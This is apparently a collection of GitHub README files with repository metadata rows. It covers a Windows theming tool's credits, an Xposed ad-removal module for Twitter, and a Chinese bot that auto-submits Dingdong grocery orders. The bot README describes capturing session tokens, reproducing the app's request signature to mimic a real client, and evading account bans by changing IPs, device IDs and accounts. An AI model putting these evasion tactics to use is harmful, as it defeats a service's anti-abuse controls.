- [Animation and transition effects for controls by FluentTransitions, developed by Andreas Wäscher](https://github.com/awaescher/FluentTransitions)
- [Animation for Controls by Pavel Torgashov](https://www.codeproject.com/Articles/548769/Animator-for-WinForms)
- [Modern dialogs design (messages boxes) by Ookii.Dialogs.WinForms](https://github.com/ookii-dialogs/ookii-dialogs-winforms)
- [Using JetBrainsMono as a monospaced font for WinPaletter](https://github.com/JetBrains/JetBrainsMono)
- [These items are provided by Microsoft: Classic color schemes, Luna theme preview (Luna.msstyles) and Command Prompt and PowerShell raster fonts previews](https://www.microsoft.com)
## ![alt text](https://github.com/Abdelrhman-AK/WinPaletter/blob/master/Media/Mini-Icons/License.png?raw=true) License
WinPaletter is licensed under the [MIT/LGPL Dual License](https://github.com/Abdelrhman-AK/WinPaletter/blob/master/License.md). Feel free to use, modify, and distribute it in accordance with the terms of the license.
| Advanced Windows Appearance Editor | windows10,windows11,theme,windows7,windows8-1,cursors,logonui,windows-classic,command-prompt,powershell | 40 | 8 | 16 | 1,289 | 11 | 1 | 1 |
Dr-TSNG/TwiFucker | <p align="center">
<img src="./app/src/main/res/mipmap-xxxhdpi/ic_launcher.png" width="150">
</p>
<h1 align="center">TwiFucker</h1>
<div align="center">
### Yet Another Adkiller for Twitter
[![author][author-image]][author-url]
[![release][release-image]][release-url]
[![last commit][last-commit-image]][last-commit-url]
English | [Indonesia](README_IN.md) | [日本語](README_JA.md)
##
<a href="https://t.me/TwiFucker"><img src="https://img.shields.io/badge/Telegram-2CA5E0?style=for-the-badge&logo=telegram&logoColor=white" alt="Join TwiFucker Telegram Group"></a>
⚠️ This is an Xposed module. Support only API 93+ ⚠️
You can find Beta version / Rootless integration (automatically embed latest Twitter with [LSPatch](https://github.com/LSPosed/LSPatch)) at our Telegram channel
[author-image]: https://img.shields.io/badge/author-Nullptr-blue.svg
[author-url]: https://github.com/Dr-TSNG
[release-image]: https://img.shields.io/github/v/release/Dr-TSNG/TwiFucker?color=blue
[release-url]: https://github.com/Dr-TSNG/TwiFucker/releases/latest
[last-commit-image]: https://img.shields.io/github/last-commit/Dr-TSNG/TwiFucker?label=last%20commit
[last-commit-url]: https://github.com/Dr-TSNG/TwiFucker/commits
</div>
##
## 🚫 This project is currently discontinued due to [shameless plagiarism](https://t.me/TwiFucker/475)
### ⚠️ Copyright Notice
What we hate most about is the modification of our texts, especially our **MODULE TITLE**, which absolutely means they want others to think all the work is done by THEM instead of others, though they actually helped NOTHING with the module development.
We are not opposed to integrating our module in your client, but we strongly condemn the behavior of **modifying our texts and hiding our author info**.
Although our project was open source before, we didn't set up a license, so **ALL COPYRIGHTS RESERVED**. And from now on we decline ANY modification or pre-patched client. It's ok if you LSPatch Twitter with our module by yourself, but you should not release your patched apk anywhere.
<details>
<summary><h2>✨ Features</h2></summary>
<div align="center">
## Remove promoted content
<img alt="promoted tweet" src="./images/promoted_tweet.webp" width="256" />
## Remove promoted users
<img alt="who to follow" src="./images/who_to_follow.webp" width="256" /> <img alt="who to follow in explore" src="./images/who_to_follow_explore.webp" width="256" />
## Remove promoted trends
<img alt="promoted trends" src="./images/promoted_trends.webp" width="256" />
## Remove sensitive media warning
<img alt="sensitive media warning" src="./images/sensitive_media_warning.webp" width="256" />
## Disable recommended users
<img alt="recommended users" src="./images/recommended_users.webp" width="256" />
## Copyable alt text
<img alt="copyable alt text" src="./images/copyable_alt_text.webp" width="256" />
## Download media menu
<img alt="download menu share" src="./images/download_menu_share.webp" width="256" /> <img alt="download menu" src="./images/download_menu.webp" width="256" />
## Hide drawer items
<img alt="hide drawer items" src="./images/hide_drawer_items.webp" width="256" />
Slightly broken due to Twitter new drawer layout.
## Hide navigation bar items
<img alt="hide navigation bar items" src="./images/hide_navigation_bar_items.webp" width="256" />
## Disable url redirect
Prevent Twitter redirect from `t.co` to target link when clicking on a link in Twitter.
## Disable Threads (live content)
<img alt="disable threads" src="./images/disable_threads.webp" width="256" />
## Disable Tweet Detail Related Tweets
<img alt="disable tweet detail related tweets" src="./images/disable_tweet_detail_related_tweets.webp" width="256" />
## Remove video carousel
<img alt="remove video carousel" src="./images/video_carousel.webp" width="256" />
## Feature switch
Force enable/disable Twitter experimental feature.
## Disable banner view
<img alt="disable banner view" src="./images/disable_banner_view.webp" width="256" />
</details>
## 🛠️ Usage
- Long tap Twitter logo at top of the Twitter home screen OR
- `Settings and privacy` > `Additional resources` > Tap version
## 🚀 Stargazers over time
[![Stargazers over time](https://starchart.cc/Dr-TSNG/TwiFucker.svg)](https://starchart.cc/Dr-TSNG/TwiFucker)
| Yet Another Adkiller for Twitter | android,twitter,xposed | 14 | 17 | 71 | 285 | 20 | 1 | 3 |
JannsenYang/dingdong-helper | # dingdong-helper
叮咚自动下单 并发调用接口方式 多人实战反馈10秒以内成功 自动将购物车能买的商品全部下单 只需自行编辑购物车和最后支付即可
当前时间2022-04-19根据自身和身边朋友反馈正常下单,但不能保证每一个人都能成功下单,如果此程序完全不可用,我会更新到这个位置
这个项目看上去要接近尾声了,我所在的地方团菜很容易,而且比叮咚便宜的多,叮咚越来越贵了,商品种类也越来越少,背后的阴谋论不去推敲,更新和回复不会很频繁了,如果大家对项目有什么重大改进的话可以直接fork此项目进行修改并留言在issues中推荐给更多有需要的人用,感谢大家的支持
# 重大更新 重大更新 重大更新 当前小程序版本:2.83.0
完全还原签名算法(请使用jdk1.8,高版本不带此功能),保证和真机一模一样的请求参数,之前请求中有签名字段,但是后端无验证,为了避免留下把柄,展现了一把我深厚的js功底,现在请求和小程序一模一样,没有任何参数不同
# 关于封号
issues中今天有不少不能下单的,根据我自身和朋友的反馈并没有出现,推荐大家还是用时间触发5点59和8点29执行2分钟,没抢到也不要再执行了,对于被风控的兄弟说声抱歉。
害怕封号者慎用
避免以下几点
1. 并发程序不要执行超过2分钟(时间触发等待时间不算)
2. 低峰期不要使用并发程序,特别是在购物车无商品或无配送的情况下,如果能下单还好,如果不能下单在低峰期这些并发请求全部会被叮咚服务器处理非常容易被风控,高峰期是限流策略直接把请求给忽略了不处理。
3. 一天不要下超过两单,有时候早上第三单就不让支付了,下午又可以了,也有人反馈第二单就不让支付了,隔天再试一下就可以确认是不是因为多单问题
4. 慎用哨兵模式,执行时间不宜超过3小时,并且尽量加大请求和轮询间隔
尝试方案
1. 过一段时间再试
2. 重新登录
3. 更换ip,家庭宽带重启猫(非自己买的路由器,运营商送的那个)或使用手机热点移动网络
4. 根据issues中反馈,有人修改device_id和open_id就成功了,这两个参数后端不校验
5. 拨打客服电话(按以往其他平台的经验,底气要十足,就说不知道)
6. 换号
# 特别强调 注意事项
1. 此程序只用来帮助在上海急需买菜的程序猿,请勿商用,issues中非技术问题本人不参与也不会阻止大家讨论
2. 叮咚的策略是6点和8点30更新当天配送时间,全天都有可能会上架货品,所以每天最佳抢菜时间是6点(当天第一轮允许下单),如果6点-8点30之间一直能配送那么8点30不会有任何变化,8点30主要是更新配送时间,只有当8点30之前无法配送的时候(当天第二轮允许下单)才需要在这个时间抢配送额度。总结6点抢库存和配送,8点30只抢配送
3. 不要删除Application中的保护线程,此段代码控制程序并发执行时2分钟未下单自动终止,避免对叮咚服务器造成压力,也避免封号
4. 接口如果出现405状态有以3种可能 1.偶发,无需处理 2.不要长时间运行程序,参考上面的第2点 3.一个账号下单数有时会有限制 参考上面的第3点
5. 根据反馈有少部分人的站点是假库存,可能是怕大家闹事,开放购买之前能看到购物车里有,但是根本就不可能买到,第一秒下单瞬间很多东西就没了,我也是,几百块的购物车最后下单几十块,我同时用app人工操作了购物车确实是没货了,不是程序问题。
6. 日期20220412我这个站点是6点开始陆续上东西,6点之前购物车没有东西可以买
## 环境
非Java开发很多 加一点新手教学 老手直接忽略
1. intellij idea 新手教学:下载路径 https://www.jetbrains.com/idea/download/#section=windows 下载好使用30天试用版即可 祈祷30天内能回归正常生活
2. jdk 8 新手教学:下载路径 https://www.oracle.com/java/technologies/downloads/#java8-windows 搜索Java SE Development Kit 8u321找到合适你系统和cpu的版本 一键安装
3. maven 新手教学:可用idea内置maven 什么都不用操作
4. 打开idea - (file 如果是第一次安装跳过此项直接能看到open) - open - 项目文件夹 - 等待右下角maven构建进度条
5. 新手不要自己新建一个项目在往项目里加文件 直接使用方式4 等待进度条结束即可 如果不小心叉掉了进度条,删掉项目,重新拉,重复步骤4(有其他方法,但新手很难理解就不推荐了)
6. 如果通过下载压缩包解压项目注意文件夹层次问题,打开的文件夹中根目录只能是pom.xml src ....这些文件或文件夹
对java完全不熟悉的来个快速入门
``` java
public class UserConfig { //UserConfig是类名 下面文档中说的执行Application就是类名
//一个类只能有一个main方法 也就是启动方法 在idea中右键此文件Run就是执行这个类 如果该类中没有main方法则没有Run这个选项 项目中的Api类就没有main方法
public static void main(String[] args) {
}
}
```
## 步骤
1. 通过Charles(我截图和教程是Charles,用Charles会更方便对比)等抓包工具抓取微信中叮咚买菜小程序中的接口信息中的用户信息配置到UserConfig.java中
2. 运行UserConfig.java获取默认收货地址城市id、站点id、地址id并填入对应变量中,再执行一次确认配置正确,会有日志输出
3. 将需要买的菜自行通过APP放入购物车
4. 5-8执行模式根据使用需求自选
5. 测试模式(单线程): 执行ApplicationTest低峰期单次下单
6. 人工执行(多线程并发):设置Application中的policy变量1并运行,如果当前购车有商品并有配送时间则会在10秒内执行成功
7. 时间触发(多线程并发):设置Application中的policy变量2或3并运行,当系统时间到达5点59分30秒或8点29分30秒自动执行,如果购买成功将播放一分钟的提示音(请确保电脑外放无静音)
8. 哨兵模式(单线程):设置Sentinel中最小下单金额并运行,当金额超过设置金额时尝试下单,请注意此模式下不并发,所以在6点和8点30左右的高峰期可能会存在长时间无法正常下单,高峰期买菜使用6或者7策略,如果购买成功将播放一分钟的提示音(请确保电脑外放无静音) 有不少反馈长时间运行还是会可能出现封号等问题,我本人昨天运行几个小时候也出现了,重新登录即可,加长间隔后跑了四五个小时未出现
9. 等待程序结束,如果成功下单请在5分钟内付款,否则订单会取消,用手机打开叮咚买菜app-我的订单-待支付-点击支付
10. 每次抢之前跑一下UserConfig中的main方法确认登录状态是否准确,如果状态不对则重新抓包更新UserConfig数据
11. 如果想用自己的号帮别人下单,只需要手动在APP中设置一下默认地址再运行UserConfig 获取到addressId和stationId进行替换
12. 如果想测试下单,上海是比较难测试的,可以把默认地址选择杭州进行测试
## 程序自动结束的几个条件
1. 购物车无可购买商品(时间触发和哨兵模式会持续执行)
2. 下单成功
3. 用户登录信息失效
## 快捷抓包
小程序已经有PC版了,手机进入小程序右上角3个点->在电脑中打开即可,送上一个参考文章https://blog.csdn.net/z2181745/article/details/123002569 比手机抓包方便太多。
注意事项
1. Charles安装和配置好后再打开或重新打开电脑端叮咚小程序,如果在之前打开可能会抓不到
2. 如果使用电脑端小程序抓包,则不要去碰手机微信里的叮咚小程序,否则session会失效,反过来也一样,其他操作在app上操作不影响,但不能同时在两个端的小程序操作,互斥
3. 确保电脑和手机没有打开vpn(公司的或者梯子)
## 设备分工(同上面的步骤,把设备关系说清楚)
#### 手机&电脑
1. 打开微信小程序中的叮咚买菜,通过电脑抓包软件抓取信息填入代码中,在token不失效的情况下可以一直使用
2. 也可以使用电脑端小程序进行抓包会比手机方便很多
#### 手机
1. 在开放购买前选择商品到购物车
2. 等待下单成功后去待支付订单页面支付
#### 电脑
1. 运行UserConfig获取addressId并填入变量addressId
2. 开放购买前1分钟运行Application,前30秒左右会获取基本信息直到看到提交订单失败的信息则代表基本信息获取完毕等待开放时间一到即可成功
## 思路
虽然我家吃的很多,但是时间长了也受不了这几天每天早上起来抢菜,手都点抽经了都买不到,看着购物车里的菜越来越少心急如焚,作为程序员只能靠自己的双手了,吃完午饭开干,晚上6点成功下单
1. 抓app的包没抓到
2. 抓小程序的包可以,但是小程序无法做登录,拿不到open id,所以只能通过自行抓包解决。另看到请求参数中有一些签名字段,心想麻烦哟
3. 准备研究如何签名,解包微信小程序,初步研究签名相关代码,搞不定就去研究app hook,但那耗费精力太大,留着当后手
4. 先写一个获取地址的请求,发现那几个看着像签名的参数可以不用传,省了一大笔精力,应该一开始就用Charles的breakpoint删除参数再repeat尝试无签名是否可访问,被唬住了,早知道就可以省略步骤3
5. 梳理下单需要的参数和步骤,数据量非常庞大,眼睛都看晕了,需要细心
6. 看到下单成功很开心,这就是乐趣
最后希望疫情早日结束大家伙都能吃上饭
## 更新记录
### 2022.04.11
1. 新增自动勾选购物车
2. 优化请求量过大和持续时间过长被网关拦截提示
3. 执行UserConfig时新增站点信息确认,如站点信息错误将导致购物车在手机上看有货程序执行无货或无法下单
### 2022.04.12
1. 叮咚更新了异常返回数据结构,修改异常日志输出
2. 修复无法使用优惠券的问题
3. 修复明明显示有配送信息但下单时报该时间段不能配送的问题
### 2022.04.13
1. 新增平常时间段哨兵模式(长间隔单线程),设置最小下单金额,成功下单后会播放一分钟的铃声,请将电脑音量打开到合适的音量
2. 新增5点59和8点29两个时间触发程序(并发),如需使用 请设置Application中的policy变量,成功下单后会播放一分钟的铃声,请将电脑音量打开到合适的音量
3. 新增并发时保护程序,默认并发执行2分钟,避免封号和对叮咚服务器造成的压力
### 2022.04.14
1. 提交订单的间隔时间拉长后下单效率明显降低,30秒才成功,改回原配置
### 2022.04.15
1. 完全还原签名算法(请使用jdk1.8,高版本不带此功能),保证和真机一模一样的请求参数,之前请求中有签名字段,但是后端无验证,为了避免留下把柄,展现了一把我深厚的js功底,现在请求和小程序一模一样,没有任何参数不同
## 抓包截图 将你的信息填入
这个图有时候会挂,直接从项目里面看也一样,就是路径image/headers.jpeg 和 body.jpeg 对应到UserConfig中的headers和body方法里的参数
![请求头信息](https://github.com/JannsenYang/dingdong-helper/blob/05cc65034b062d3a7844ec706e7876f8e5a57586/image/headers.jpg)
![请求体信息](https://github.com/JannsenYang/dingdong-helper/blob/0433cc7def733820d734f48dec6e47fc0f2d89c8/image/body.jpg)
## 20220410实战记录
用了的全部秒抢,我自己傻逼了,为了提交github,收货地址id在运行的时候忘记填了,跑了几分钟才后知后觉,随即补上了失败时的返回信息。
![实战记录1](https://github.com/JannsenYang/dingdong-helper/blob/3f1847b6f5c363168de733380d9f3cb02a64b8a6/image/20220410-1.png)
![实战记录2](https://github.com/JannsenYang/dingdong-helper/blob/f6e20d377aa482063732a5be614e3dae3d4c5091/image/20220410-2.png)
### 版权说明
**本项目为 GPL3.0 协议,请所有进行二次开发的开发者遵守 GPL3.0协议,并且不得将代码用于商用。**
| 叮咚自动下单 并发调用接口方式 多人高峰期实战反馈10秒以内成功 自动将购物车能买的商品全部下单 只需自行编辑购物车和最后支付即可 | ding-dong,dingdong,ding,dong | 0 | 3 | 10 | 154 | 171 | 1 | 0 |